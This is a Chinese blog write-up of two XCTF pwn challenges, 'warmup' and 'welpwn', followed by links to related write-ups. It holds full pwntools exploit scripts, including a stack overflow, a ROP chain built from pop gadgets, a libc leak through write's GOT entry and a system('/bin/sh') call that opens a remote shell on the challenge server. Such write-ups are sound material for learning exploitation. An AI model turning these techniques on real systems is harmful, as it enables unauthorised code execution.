攻防世界pwn(warmup&welpwn)

最新推荐文章于 2024-06-30 15:13:02 发布
最新推荐文章于 2024-06-30 15:13:02 发布
阅读量470 收藏
点赞数
分类专栏: 攻防世界 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/song_10/article/details/106251399
版权

更多内容关注博客新址

If you don’t go into the water, you can’t swim in your life

文中所用到的程序文件:bin file

warmup

# -*- coding: cp936 -*-
from pwn import *

# def get_length():
#   i = 0
#   while True:
#       try:
#           p = remote('101.200.240.241',7000)
#           p.recvuntil('biu:')
#           func = int(p.recv(8),16)
#           log.success("func=%#x",func)
#           payload = 'A'*64 + '\x00' + 'B'*i + p64(func)
#           p.sendline(payload)
#           p.recv()
#           try:
#               output = p.recv()
#               return i
#           except EOFError:
#               i += 1
#       except:
#           i += 1
#           p.close()

# length = get_length()
length = 7

p = remote('124.126.19.106',39729)
print p.recv()
print p.recv()
payload = 'A'*64 + '\x00'+ 'B'*7 + p64(0x40060d)
p.sendline(payload)
print p.recv()

welpwn

main函数中的read读入很长的内容,但是没办法造成栈溢出。只能把关注点放到函数echo

int __fastcall echo(__int64 a1)
{
  char s2[16]; // [rsp+10h] [rbp-10h]

  for ( i = 0; *(_BYTE *)(i + a1); ++i )
    s2[i] = *(_BYTE *)(i + a1);
  s2[i] = 0;
  if ( !strcmp("ROIS", s2) )
  {
    printf("RCTF{Welcome}", s2);
    puts(" is not flag");
  }
  return printf("%s", s2);
}

可以发现这个函数实际上就是把之前read获得的输入复制到栈上的数组s2中,很容易发现溢出点就在这个地方。

但是还有一个问题,这个复制过程有0截断,也就是说当我们写入一连串地址时,并不能够将所有地址都成功复制到s2中,而64位的程序在构造ROP链时无论如何都会有0x00。
不过幸运的是echo的函数栈帧很小:

.text:000000000040071D                 push    rbp
.text:000000000040071E                 mov     rbp, rsp
.text:0000000000400721                 sub     rsp, 20h
.....
.text:00000000004007CB                 leave
.text:00000000004007CC                 retn

也就是说我们可以通过简单的pop填充,是rsp指向我们在输入时布置在main的栈帧中的地址,进而劫持RIP到指定函数完成libc泄露和get shell

from pwn import *
from LibcSearcher import *
context(arch='amd64',os='linux',log_level='DEBUG')

# p = process('./welpwn')
p = remote('124.126.19.106',59629)
elf = ELF('./welpwn',checksec=False)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']
pop_rdi = 0x00000000004008a3 # pop rdi ; ret
pop4 = 0x000000000040089C
# we could find it just execute pop xxx 4 times and it will arrive the location we put on stack frame of main by debug
gadgets1 = 0x000000000040089A
gadgets2 = 0x0000000000400880

# call write to leak libc by universe gadgets(get shell successfully both server and local)
payload = 0x18 * 'A'
payload += flat([
    pop4, gadgets1, 0, 1, write_got, 8, write_got, 1, gadgets2
    ])
payload += 'A'*56 + p64(main)
p.send(payload)
p.recvuntil("Welcome to RCTF\n")
write_addr = u64(p.recv(6).ljust(8,'\x00'))
log.success('write_addr = %#x',write_addr)
# pause()
libc = LibcSearcher('write',write_addr)
libc_base = write_addr - libc.dump('write')

'''
# get shell successfull locally
payload = (0x18)*'A'
payload += flat([pop4 ,pop_rdi,puts_got, puts_plt, main])
p.recvuntil("Welcome to RCTF")
p.send(payload)
# pause()
data = p.recvuntil("Welcome to RCTF\n",drop=True)
pust_addr = u64(data[-7:-1].ljust(8,'\x00'))
log.success('pust_addr = %#x',pust_addr)
# pause()

libc = LibcSearcher('puts',pust_addr)
libc_base = pust_addr - libc.dump('puts')
'''

system_addr = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
log.success('system_addr = %#x, binsh = %#x'%(system_addr,binsh))

payload = 'A'*(0x18)
payload += flat([pop4, pop_rdi, binsh, system_addr, main])
p.send(payload)
sleep(0.1)
p.interactive()
song-10
关注
专栏目录
攻防世界 pwn
清霂的博客
02-02 688
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
[攻防世界 pwn]——warmup
Y_peak的博客
02-20 666
[攻防世界 pwn]——warmup 题目地址: https://adworld.xctf.org.cn/ 题目: 嘶, 碰过的第一个盲打的题, nc连上之后只有一个地址, 这个地址肯定是个有用的地址, 应该就是可以执行 system("/bin/sh")或者 system(“cat flag”)的地址。 提供了一个输入, 应该是可以进行栈溢出, 不然就太难了。尝试一下, 不过不知道要填充的长度也不知道是64位还是32位的。 我们只有挨个尝试, 写个exp如下: exploit from pwn i
攻防世界 hello_pwn
最新发布
weixin_73399382的博客
06-30 374
然后从指针&unk_601068指定的缓冲区里面读取最多16位数据(0x10uLL解读:0x代表十六进制,uLL=unsigned long long,无符号long long 型,10转为十进制即为16)直接执行一下,这里看别人的wp是可以通过输入构造字符串来getshell的,我这里就不这么做了,多练写脚本的能力。国际惯例checksec一下,64位小端序,未开启栈溢出保护和地址随机化,很明显这道题利用栈溢出了。刚学pwn的小白,大家互相学习,看看哪里说得不对打在评论区!写脚本,下面两个略微差别。
CTF(pwn)攻防世界warmup
半岛铁盒的博客
03-06 902
题目描述 这种题很有意思,只给了题目场景地址没有文件,让你盲打,类似于web中的盲注吧; nc连接,给了 目标地址, 思路是:利用栈溢出覆盖,返回这个地址; 具体是溢出多少是不确定的,是P64(),还是 P32() 也是不确定的; 写个EXP逐渐试一下 from pwn import * a = 0x40060d for i in range(10,100): p = remote('111.200.241.244',49684) payload='a'*i+p64(a) p.recvun
攻防世界pwn——pwn1
qq_62076255的博客
12-21 471
做题记录
攻防世界PWN--CGfsb
Rt1Text的博客
03-27 3387
首先checksec 32位/ 开了 Canary/NX保护 再运行一下 大致就是这个流程 接下来ida里面 分析C代码 分析前先get一下格式化字符串漏洞的基础知识 举3个常见的相关函数 fprintf----prints to a FILE stream printf----prints to the 'stdout' stream sprintf--prints into a string 常见语法 %d---打印 signed int %u---打印 u...
攻防世界PWN进阶区(warmup
BurYiA的博客
02-03 1549
warmup 这是一个没有附件的题,看起来题目是要求我们fuzz了 nc连接上后可以发现有个输入点,并且还给了我们一个十六进制数,看起来是个地址 那首先根据这些我们可以先将fuzz函数写出来,分三种情况(不用他给的地址,用p32发送,用p64送) def fuzz(r, num, flag): payload = 'a' * num if flag==1: pa...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1850
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 440
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 522
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1414
学习pwn开始,慢慢来不要急
攻防世界pwn——Mary_Morton
qq_62076255的博客
12-19 187
做题记录
攻防世界-PWN-hello_pwn
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 507
开始进军PWN题 目录 分析 拖入IDA exp 分析 使用 file 和 checksec(查看程序的保护机制) 指令分析文件 x86-64 架构 Linux可执行文件ELF checksec参数 Arch 程序架构信息。这里是amd64-64的 RELRO 主要针对 GOT 改写的攻击方式的保护 RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。 这里也没作保护 Stack 栈保护 这里没有启用 NX 栈没有执行权限 这里是打开的 PI.
攻防世界——pwn(3)
weixin_44319142的博客
04-11 885
guess_num seed和rand的知识点就是一个伪生成随机数的东西要用ctypes倒入这个库才能用rand 理一下思路,利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了 exp from pwn import * from ctypes import * #倒入了可以去找libc库 context.log_level = 'debug' p =...
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 4120
攻防世界-Pwn-new-easypwn
攻防世界(pwn篇)---CGfsb
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-09 1773
攻防世界(pwn篇)—CGfsb 文章目录攻防世界(pwn篇)---CGfsb题目描述基本情况分析运行分析IDA 分析格式化字符串漏洞分析出payload找一下 s 的偏移量再看一看 pwnme 的地址exp 题目描述 菜鸡面对着pringf发愁,他不知道prinf除了输出还有什么作用 基本情况分析 checksec命令可以查看可执行文件开启的保护 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.S
攻防世界——pwn(2)
weixin_44319142的博客
04-09 1329
hello_pwn 只有NX哟 没啥好说的,填充然后让60106c的位置为1853186401就可以啦 直接上exp from pwn import * p = process("./hello_pwn") p.recvuntil('lets get helloworld for bof\n') payload = "A"*4 + p64(1853186401) p.send(payl...
pwn_warmup
weixin_44464829的博客
10-31 388
这个题没有附件,只好nc服务器: 发现给了我们一个类似地址的东西,该怎么利用。 猜想flag应该就在这个地址,或者这个地址的附近。这里不得不提到一个方法叫做fuzz(模糊测试): Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。 所以额,我们要写一个函数,这个函数可以为我们生成很多地址,如果这个地址正确了,flag就会被我拿到 d
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值